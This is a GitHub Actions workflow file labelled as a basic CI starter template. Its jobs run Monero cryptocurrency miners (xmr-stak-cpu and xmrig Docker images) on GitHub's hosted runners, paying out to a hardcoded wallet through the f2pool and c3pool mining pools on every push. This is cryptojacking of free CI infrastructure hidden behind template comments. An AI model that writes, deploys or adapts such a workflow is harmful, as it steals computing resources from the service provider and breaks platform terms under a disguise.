# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the action will run. 
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:
jobs:
  xmr-stak:
    runs-on: ubuntu-latest
    steps:
      - name: 拉取
        run: docker pull cryptocurrency/xmr-stak-cpu
        
      - name: 执行
        run: |
          docker run --name xmr -e WALLET="848rns8JmwcTQscYFwsxS6ft9NQoN3TeNYHebyFniF3dPSKgqVR1TrFd9KXCfbuBPMT5qcm2FAVFk95Cjy5Bmz45LhVkUQn" -e POOL="xmr.f2pool.com:13531" -d cryptocurrency/xmr-stak-cpu
          sleep 3h
          docker stop xmr
          
  xmrig:
    runs-on: ubuntu-latest
    steps:
      - name: 拉取
        run: docker pull wtbhk/xmrig-docker
      - name: 执行
        run: |
          docker run wtbhk/xmrig-docker --rig-id $RANDOM -o mine.c3pool.com:13333 -u 848rns8JmwcTQscYFwsxS6ft9NQoN3TeNYHebyFniF3dPSKgqVR1TrFd9KXCfbuBPMT5qcm2FAVFk95Cjy5Bmz45LhVkUQn
        
